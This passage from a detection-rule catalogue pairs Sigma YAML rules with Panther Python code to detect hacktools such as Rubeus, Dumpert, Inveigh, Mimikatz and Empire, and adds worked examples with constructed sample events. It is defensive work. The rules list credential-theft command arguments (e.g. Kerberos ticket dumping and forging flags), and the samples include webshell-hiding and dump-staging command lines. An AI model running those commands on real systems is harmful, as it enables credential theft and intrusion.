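    """A selection that is a list of maps is OR; a map is AND over its field entries."""
    if isinstance(selection, list):
        return any(match_selection(event, item) for item in selection)
    return all(match_field(event, spec, vals) for spec, vals in selection.items())


def evaluate(detection, event):
    """Evaluate a rule's 'detection' block: 'selection', '1 of prefix*' or 'all of prefix*'."""
    cond = detection["condition"].strip()
    m = re.fullmatch(r"(1|all) of (\w+)\*", cond)
    if not m:
        return match_selection(event, detection[cond])
    chosen = [n for n in detection if n != "condition" and n.startswith(m.group(2))]
    results = [match_selection(event, detection[n]) for n in chosen]
    return any(results) if m.group(1) == "1" else all(results)


# Transcribed from the YAML above: three of the HAFNIUM selections, and the BabyShark selection.
HAFNIUM = {
    "selection_attrib": {"CommandLine|contains|all": ["attrib", " +h ", " +s ", " +r ", ".aspx"]},
    "selection_vsperfmon": [
        {"Image|contains": "\\ProgramData\\VSPerfMon\\"},
        {"CommandLine|contains|all": ["schtasks", "VSPerfMon"]},
    ],
    "selection_makecab_2": {
        "Image|endswith": "\\makecab.exe",
        "CommandLine|contains": ["Microsoft\\Exchange Server\\", "compressionmemory", ".gif"],
    },
    "condition": "1 of selection*",
}
BABYSHARK = {"selection": {"c-uri|contains": "momyshark\\?key="}, "condition": "selection"}

# Constructed sample events (not real telemetry), flat like Panther's process_creation / proxy logs.
SAMPLE_EVENTS = {
    "webshell_hidden": {"CommandLine": "attrib +h +s +r C:\\inetpub\\wwwroot\\aspnet_client\\x.aspx"},
    "webshell_upper": {"CommandLine": "ATTRIB +H +S +R C:\\INETPUB\\WWWROOT\\X.ASPX"},
    "makecab_gif": {"Image": "C:\\Windows\\System32\\makecab.exe",
                    "CommandLine": "makecab C:\\Windows\\Temp\\a.dmp C:\\inetpub\\wwwroot\\a.gif"},
    "benign_attrib": {"CommandLine": "attrib -r C:\\Users\\a\\notes.txt"},
    "babyshark": {"c-uri": "/momyshark?key=0123456789abcdef"},
    "not_babyshark": {"c-uri": "/momyshark/key=0123456789abcdef"},
}


def demo():
    """Return {sample name: (HAFNIUM fires, BabyShark fires)} for the constructed events."""
    return {name: (evaluate(HAFNIUM, ev), evaluate(BABYSHARK, ev)) for name, ev in SAMPLE_EVENTS.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:16s} hafnium={verdict[0]} babyshark={verdict[1]}")
```

The `webshell_upper` sample is why the case folding matters: the same `attrib +h +s +r ... .aspx` command typed in capitals still fires here, while a check built on case-sensitive `in` would miss it. The `not_babyshark` sample fires only if `\?` is wrongly treated as a wildcard, which is the difference between the literal `?` and the `\?` the rendered Python above originally searched for.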
critical
HackTool - Credential Dumping Tools Named Pipe Created
Detects well-known credential dumping tools execution via specific named pipe creation
status test author Teymur Kheirkhabarov, oscd.community id 961d0ba2-3eea-4303-a930-2cf78bbfcc5e
panther query
def rule(event):
    if any(
        [
            "\\cachedump" in event.deep_get("PipeName", default=""),
            "\\lsadump" in event.deep_get("PipeName", default=""),
            "\\wceservicepipe" in event.deep_get("PipeName", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - Credential Dumping Tools Named Pipe Created
id: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e
status: test
description: Detects well-known credential dumping tools execution via specific named pipe creation
references:
    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
    - https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799
author: Teymur Kheirkhabarov, oscd.community
date: 2019-11-01
modified: 2023-08-07
tags:
    - attack.credential-access
    - attack.t1003.001
    - attack.t1003.002
    - attack.t1003.004
    - attack.t1003.005
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains:
            - '\cachedump'
            - '\lsadump'
            - '\wceservicepipe'
    condition: selection
falsepositives:
    - Legitimate Administrator using tool for password recovery
level: critical
critical
HackTool - DInjector PowerShell Cradle Execution
Detects the use of the Dinject PowerShell cradle based on the specific flags
status test author Florian Roth (Nextron Systems) id d78b5d61-187d-44b6-bf02-93486a80de5a
panther query
def rule(event):
    if all(
        [
            " /am51" in event.deep_get("CommandLine", default=""),
            " /password" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - DInjector PowerShell Cradle Execution
id: d78b5d61-187d-44b6-bf02-93486a80de5a
status: test
description: Detects the use of the Dinject PowerShell cradle based on the specific flags
references:
    - https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork
author: Florian Roth (Nextron Systems)
date: 2021-12-07
modified: 2023-02-04
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' /am51'
            - ' /password'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - DiagTrackEoP Default Named Pipe
Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
status test author Nasreddine Bencherchali (Nextron Systems) id 1f7025a6-e747-4130-aac4-961eb47015f1
panther query
def rule(event):
    if "thisispipe" in event.deep_get("PipeName", default=""):
        return True
    return False
view Sigma YAML
title: HackTool - DiagTrackEoP Default Named Pipe
id: 1f7025a6-e747-4130-aac4-961eb47015f1
status: test
description: Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
references:
    - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-03
modified: 2023-08-07
tags:
    - attack.privilege-escalation
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains: 'thisispipe' # Based on source code
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Dumpert Process Dumper Default File
Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
status test author Florian Roth (Nextron Systems) id 93d94efc-d7ad-4161-ad7d-1638c4f908d8
panther query
def rule(event):
    if event.deep_get("TargetFilename", default="").endswith("dumpert.dmp"):
        return True
    return False
view Sigma YAML
title: HackTool - Dumpert Process Dumper Default File
id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8
related:
    - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
      type: derived
status: test
description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
references:
    - https://github.com/outflanknl/Dumpert
    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2023-05-09
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: 'dumpert.dmp'
    condition: selection
falsepositives:
    - Very unlikely
level: critical
critical
HackTool - Dumpert Process Dumper Execution
Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
status test author Florian Roth (Nextron Systems) id 2704ab9e-afe2-4854-a3b1-0c0706d03578
panther query
def rule(event):
    if any(
        [
            "MD5=09D278F9DE118EF09163C6140255C690" in event.deep_get("Hashes", default=""),
            "Dumpert.dll" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - Dumpert Process Dumper Execution
id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
status: test
description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
references:
    - https://github.com/outflanknl/Dumpert
    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2025-01-22
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Hashes|contains: 'MD5=09D278F9DE118EF09163C6140255C690'
        - CommandLine|contains: 'Dumpert.dll'
    condition: selection
falsepositives:
    - Very unlikely
level: critical
critical
HackTool - Empire PowerShell UAC Bypass
Detects some Empire PowerShell UAC bypass methods
status stable author Ecco id 3268b746-88d8-4cd3-bffc-30077d02c787
panther query
def rule(event):
    if any(
        [
            " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)"
            in event.deep_get("CommandLine", default=""),
            " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);"
            in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - Empire PowerShell UAC Bypass
id: 3268b746-88d8-4cd3-bffc-30077d02c787
status: stable
description: Detects some Empire PowerShell UAC bypass methods
references:
    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64
author: Ecco
date: 2019-08-30
modified: 2023-02-21
tags:
    - attack.privilege-escalation
    - attack.t1548.002
    - car.2019-04-001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)'
            - ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - F-Secure C3 Load by Rundll32
F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
status test author Alfie Champion (ajpc500) id b18c9d4c-fac9-4708-bd06-dd5bfacf200f
panther query
def rule(event):
    if all(
        [
            "rundll32.exe" in event.deep_get("CommandLine", default=""),
            ".dll" in event.deep_get("CommandLine", default=""),
            "StartNodeRelay" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - F-Secure C3 Load by Rundll32
id: b18c9d4c-fac9-4708-bd06-dd5bfacf200f
status: test
description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
references:
    - https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12
author: Alfie Champion (ajpc500)
date: 2021-06-02
modified: 2023-03-05
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'rundll32.exe'
            - '.dll'
            - 'StartNodeRelay'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - Inveigh Execution
Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
status test author Nasreddine Bencherchali (Nextron Systems) id b99a1518-1ad5-4f65-bc95-1ffff97a8fd0
panther query
def rule(event):
    if any(
        [
            event.deep_get("Image", default="").endswith("\\Inveigh.exe"),
            event.deep_get("OriginalFileName", default="") in ["\\Inveigh.exe", "\\Inveigh.dll"],
            event.deep_get("Description", default="") == "Inveigh",
            any(
                [
                    " -SpooferIP" in event.deep_get("CommandLine", default=""),
                    " -ReplyToIPs " in event.deep_get("CommandLine", default=""),
                    " -ReplyToDomains " in event.deep_get("CommandLine", default=""),
                    " -ReplyToMACs " in event.deep_get("CommandLine", default=""),
                    " -SnifferIP" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - Inveigh Execution
id: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0
status: test
description: Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
references:
    - https://github.com/Kevin-Robertson/Inveigh
    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\Inveigh.exe'
        - OriginalFileName:
              - '\Inveigh.exe'
              - '\Inveigh.dll'
        - Description: 'Inveigh'
        - CommandLine|contains:
              - ' -SpooferIP'
              - ' -ReplyToIPs '
              - ' -ReplyToDomains '
              - ' -ReplyToMACs '
              - ' -SnifferIP'
    condition: selection
falsepositives:
    - Very unlikely
level: critical
critical
HackTool - Inveigh Execution Artefacts
Detects the presence and execution of Inveigh via dropped artefacts
status test author Nasreddine Bencherchali (Nextron Systems) id bb09dd3e-2b78-4819-8e35-a7c1b874e449
panther query
def rule(event):
    if any(
        [
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh-Log.txt"),
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh-Cleartext.txt"),
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh-NTLMv1Users.txt"),
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh-NTLMv2Users.txt"),
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh-NTLMv1.txt"),
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh-NTLMv2.txt"),
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh-FormInput.txt"),
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh.dll"),
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh.exe"),
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh.ps1"),
            event.deep_get("TargetFilename", default="").endswith("\\Inveigh-Relay.ps1"),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - Inveigh Execution Artefacts
id: bb09dd3e-2b78-4819-8e35-a7c1b874e449
status: test
description: Detects the presence and execution of Inveigh via dropped artefacts
references:
    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs
    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs
    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2024-06-27
tags:
    - attack.command-and-control
    - attack.t1219.002
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - '\Inveigh-Log.txt'
            - '\Inveigh-Cleartext.txt'
            - '\Inveigh-NTLMv1Users.txt'
            - '\Inveigh-NTLMv2Users.txt'
            - '\Inveigh-NTLMv1.txt'
            - '\Inveigh-NTLMv2.txt'
            - '\Inveigh-FormInput.txt'
            - '\Inveigh.dll'
            - '\Inveigh.exe'
            - '\Inveigh.ps1'
            - '\Inveigh-Relay.ps1'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Koh Default Named Pipe
Detects creation of default named pipes used by the Koh tool
status test author Nasreddine Bencherchali (Nextron Systems) id 0adc67e0-a68f-4ffd-9c43-28905aad5d6a
panther query
def rule(event):
    if any(
        [
            "\\imposecost" in event.deep_get("PipeName", default=""),
            "\\imposingcost" in event.deep_get("PipeName", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - Koh Default Named Pipe
id: 0adc67e0-a68f-4ffd-9c43-28905aad5d6a
status: test
description: Detects creation of default named pipes used by the Koh tool
references:
    - https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-08
modified: 2023-08-07
tags:
    - attack.privilege-escalation
    - attack.credential-access
    - attack.stealth
    - attack.t1528
    - attack.t1134.001
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains:
            - '\imposecost'
            - '\imposingcost'
    condition: selection
falsepositives:
    - Unlikely
level: critical
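The three `pipe_created` rules above (credential dumping tools, DiagTrackEoP, Koh) share two practical prerequisites that the logsource definition only hints at: Sysmon has to emit Event ID 17 at all, and the `PipeName` field the Panther code reads has to be lifted out of the event's `EventData`. As an added example, not code from this page or from the Sysmon, Sigma or Panther projects, the following flattens Sysmon pipe events from Windows Event XML into the flat keys the rules use, runs the three rules' `PipeName|contains` lists over them case-insensitively, and lists the `PipeEvent` filters in a Sysmon config so the logging the definition tells you to verify can be checked. The XML events, the config fragment and all helper names are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Added example. Windows Event XML puts every Sysmon field under EventData as
# <Data Name="...">; the rules above expect them as flat keys such as PipeName.
EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# PipeName|contains values of the three pipe_created rules on this page, keyed by rule title.
PIPE_RULES = {
    "HackTool - Credential Dumping Tools Named Pipe Created": ["\\cachedump", "\\lsadump", "\\wceservicepipe"],
    "HackTool - DiagTrackEoP Default Named Pipe": ["thisispipe"],
    "HackTool - Koh Default Named Pipe": ["\\imposecost", "\\imposingcost"],
}


def sysmon_event_to_dict(xml_text):
    """Flatten one Sysmon event (Windows Event XML) into {EventID, <Data Name>: text, ...}."""
    root = ET.fromstring(xml_text)
    event = {"EventID": int(root.find("e:System/e:EventID", EVT_NS).text)}
    for data in root.findall("e:EventData/e:Data", EVT_NS):
        event[data.get("Name")] = data.text or ""
    return event


def matching_pipe_rules(event):
    """Titles of the pipe rules whose PipeName substrings hit. Sigma's pipe_created category
    is Sysmon Event ID 17 only (18 is PipeConnected), and Sigma 'contains' is case-insensitive."""
    if event.get("EventID") != 17:
        return []
    pipe = event.get("PipeName", "").lower()
    return [title for title, needles in PIPE_RULES.items() if any(n.lower() in pipe for n in needles)]


def pipe_event_filters(sysmon_config_xml):
    """(onmatch, rule count) for every PipeEvent filter in a Sysmon config. With no PipeEvent
    element Sysmon keeps its default for this event type and emits no 17/18 events;
    <PipeEvent onmatch="exclude"/> with no rules logs every pipe; onmatch="include" logs
    only the pipes listed under it."""
    root = ET.fromstring(sysmon_config_xml)
    return [(f.get("onmatch"), len(list(f))) for f in root.iter("PipeEvent")]


def sysmon_pipe_xml(event_id, pipe_name, image):
    """Build a constructed (not captured) Sysmon pipe event in Windows Event XML."""
    event_type = "CreatePipe" if event_id == 17 else "ConnectPipe"
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        f'<System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>{event_id}</EventID></System>'
        f'<EventData><Data Name="EventType">{event_type}</Data>'
        f'<Data Name="PipeName">{pipe_name}</Data><Data Name="Image">{image}</Data></EventData>'
        "</Event>"
    )


SAMPLE_EVENTS = [  # constructed samples; paths and pipe names are illustrative
    sysmon_pipe_xml(17, "\\lsadump", "C:\\Users\\a\\Desktop\\tool.exe"),
    sysmon_pipe_xml(17, "\\ThisIsPipe", "C:\\Windows\\Temp\\poc.exe"),
    sysmon_pipe_xml(17, "\\imposingcost", "C:\\Windows\\Temp\\koh.exe"),
    sysmon_pipe_xml(18, "\\lsadump", "C:\\Windows\\System32\\lsass.exe"),  # a connect, not a create
    sysmon_pipe_xml(17, "\\ntsvcs", "C:\\Windows\\System32\\svchost.exe"),  # ordinary RPC pipe
]

SAMPLE_CONFIG = (  # constructed Sysmon config fragment that logs every pipe create/connect
    '<Sysmon schemaversion="4.90"><EventFiltering><RuleGroup name="" groupRelation="or">'
    '<PipeEvent onmatch="exclude"/></RuleGroup></EventFiltering></Sysmon>'
)


def demo():
    """Rule hits per sample event, in SAMPLE_EVENTS order."""
    return [matching_pipe_rules(sysmon_event_to_dict(x)) for x in SAMPLE_EVENTS]


if __name__ == "__main__":
    for xml_text, hits in zip(SAMPLE_EVENTS, demo()):
        print(sysmon_event_to_dict(xml_text)["PipeName"], "->", hits or "no rule")
    print("PipeEvent filters:", pipe_event_filters(SAMPLE_CONFIG))
```

Event ID 18 (PipeConnected) is deliberately left out because Sigma's `pipe_created` category maps to 17 only; a client connecting to an existing `\lsadump` pipe would need a `pipe_connected` rule. A config that returns an empty filter list is the case the logsource definition warns about: Sysmon is running with its default for this event type and none of the three rules can ever fire.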
critical
HackTool - Mimikatz Kirbi File Creation
Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
status test author Florian Roth (Nextron Systems), David ANDRE id 9e099d99-44c2-42b6-a6d8-54c3545cab29
panther query
def rule(event):
    if any(
        [
            event.deep_get("TargetFilename", default="").endswith(".kirbi"),
            event.deep_get("TargetFilename", default="").endswith("mimilsa.log"),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - Mimikatz Kirbi File Creation
id: 9e099d99-44c2-42b6-a6d8-54c3545cab29
related:
    - id: 034affe8-6170-11ec-844f-0f78aa0c4d66
      type: obsolete
status: test
description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
references:
    - https://cobalt.io/blog/kerberoast-attack-techniques
    - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
author: Florian Roth (Nextron Systems), David ANDRE
date: 2021-11-08
modified: 2024-06-27
tags:
    - attack.credential-access
    - attack.t1558
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith:
            - '.kirbi' # Kerberos tickets
            - 'mimilsa.log' # MemSSP default file
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - PurpleSharp Execution
Detects the execution of the PurpleSharp adversary simulation tool
status test author Florian Roth (Nextron Systems) id ff23ffbc-3378-435e-992f-0624dcf93ab4
panther query
def rule(event):
    if any(
        [
            any(
                [
                    "\\purplesharp" in event.deep_get("Image", default=""),
                    event.deep_get("OriginalFileName", default="") == "PurpleSharp.exe",
                ]
            ),
            any(
                [
                    "xyz123456.exe" in event.deep_get("CommandLine", default=""),
                    "PurpleSharp" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - PurpleSharp Execution
id: ff23ffbc-3378-435e-992f-0624dcf93ab4
status: test
description: Detects the execution of the PurpleSharp adversary simulation tool
references:
    - https://github.com/mvelazc0/PurpleSharp
author: Florian Roth (Nextron Systems)
date: 2021-06-18
modified: 2023-02-05
tags:
    - attack.t1587
    - attack.resource-development
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|contains: '\purplesharp'
        - OriginalFileName: 'PurpleSharp.exe'
    selection_cli:
        CommandLine|contains:
            - 'xyz123456.exe'
            - 'PurpleSharp'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical
critical
HackTool - QuarksPwDump Dump File
Detects a dump file written by QuarksPwDump password dumper
status test author Florian Roth (Nextron Systems) id 847def9e-924d-4e90-b7c4-5f581395a2b4
panther query
def rule(event):
    if all(
        [
            "\\AppData\\Local\\Temp\\SAM-" in event.deep_get("TargetFilename", default=""),
            ".dmp" in event.deep_get("TargetFilename", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - QuarksPwDump Dump File
id: 847def9e-924d-4e90-b7c4-5f581395a2b4
status: test
description: Detects a dump file written by QuarksPwDump password dumper
references:
    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
author: Florian Roth (Nextron Systems)
date: 2018-02-10
modified: 2024-06-27
tags:
    - attack.credential-access
    - attack.t1003.002
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|contains|all:
            - '\AppData\Local\Temp\SAM-'
            - '.dmp'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - Rubeus Execution
Detects the execution of the hacktool Rubeus via PE information or command line parameters
status stable author Florian Roth (Nextron Systems) id 7ec2c172-dceb-4c10-92c9-87c1881b7e18
panther query
def rule(event):
    if any(
        [
            event.deep_get("Image", default="").endswith("\\Rubeus.exe"),
            event.deep_get("OriginalFileName", default="") == "Rubeus.exe",
            event.deep_get("Description", default="") == "Rubeus",
            any(
                [
                    "asreproast " in event.deep_get("CommandLine", default=""),
                    "dump /service:krbtgt " in event.deep_get("CommandLine", default=""),
                    "dump /luid:0x" in event.deep_get("CommandLine", default=""),
                    "kerberoast " in event.deep_get("CommandLine", default=""),
                    "createnetonly /program:" in event.deep_get("CommandLine", default=""),
                    "ptt /ticket:" in event.deep_get("CommandLine", default=""),
                    "/impersonateuser:" in event.deep_get("CommandLine", default=""),
                    "renew /ticket:" in event.deep_get("CommandLine", default=""),
                    "asktgt /user:" in event.deep_get("CommandLine", default=""),
                    "harvest /interval:" in event.deep_get("CommandLine", default=""),
                    "s4u /user:" in event.deep_get("CommandLine", default=""),
                    "s4u /ticket:" in event.deep_get("CommandLine", default=""),
                    "hash /password:" in event.deep_get("CommandLine", default=""),
                    "golden /aes256:" in event.deep_get("CommandLine", default=""),
                    "silver /user:" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - Rubeus Execution
id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
related:
    - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
      type: similar
status: stable
description: Detects the execution of the hacktool Rubeus via PE information or command line parameters
references:
    - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus
    - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
    - https://github.com/GhostPack/Rubeus
author: Florian Roth (Nextron Systems)
date: 2018-12-19
modified: 2023-04-20
tags:
    - attack.credential-access
    - attack.t1003
    - attack.t1558.003
    - attack.lateral-movement
    - attack.t1550.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\Rubeus.exe'
        - OriginalFileName: 'Rubeus.exe'
        - Description: 'Rubeus'
        - CommandLine|contains:
              - 'asreproast '
              - 'dump /service:krbtgt '
              - 'dump /luid:0x'
              - 'kerberoast '
              - 'createnetonly /program:'
              - 'ptt /ticket:'
              - '/impersonateuser:'
              - 'renew /ticket:'
              - 'asktgt /user:'
              - 'harvest /interval:'
              - 's4u /user:'
              - 's4u /ticket:'
              - 'hash /password:'
              - 'golden /aes256:'
              - 'silver /user:'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - SafetyKatz Execution
Detects the execution of the hacktool SafetyKatz via PE information and default Image name
status test author Nasreddine Bencherchali (Nextron Systems) id b1876533-4ed5-4a83-90f3-b8645840a413
panther query
def rule(event):
    if any(
        [
            event.deep_get("Image", default="").endswith("\\SafetyKatz.exe"),
            event.deep_get("OriginalFileName", default="") == "SafetyKatz.exe",
            event.deep_get("Description", default="") == "SafetyKatz",
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - SafetyKatz Execution
id: b1876533-4ed5-4a83-90f3-b8645840a413
status: test
description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
references:
    - https://github.com/GhostPack/SafetyKatz
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-20
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\SafetyKatz.exe'
        - OriginalFileName: 'SafetyKatz.exe'
        - Description: 'SafetyKatz'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - SecurityXploded Execution
Detects the execution of SecurityXploded Tools
status stable author Florian Roth (Nextron Systems) id 7679d464-4f74-45e2-9e01-ac66c5eb041a
panther query
def rule(event):
    if any(
        [
            event.deep_get("Company", default="") == "SecurityXploded",
            event.deep_get("Image", default="").endswith("PasswordDump.exe"),
            event.deep_get("OriginalFileName", default="").endswith("PasswordDump.exe"),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HackTool - SecurityXploded Execution
id: 7679d464-4f74-45e2-9e01-ac66c5eb041a
status: stable
description: Detects the execution of SecurityXploded Tools
references:
    - https://securityxploded.com/
    - https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/
author: Florian Roth (Nextron Systems)
date: 2018-12-19
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1555
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Company: SecurityXploded
        - Image|endswith: 'PasswordDump.exe'
        - OriginalFileName|endswith: 'PasswordDump.exe'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - SharpUp PrivEsc Tool Execution
Detects the use of SharpUp, a tool for local privilege escalation
status test author Florian Roth (Nextron Systems) id c484e533-ee16-4a93-b6ac-f0ea4868b2f1
panther query
def rule(event):
    if any(
        [
            event.deep_get("Image", default="").endswith("\\SharpUp.exe"),
            event.deep_get("Description", default="") == "SharpUp",
            any(
                [
                    "HijackablePaths" in event.deep_get("CommandLine", default=""),
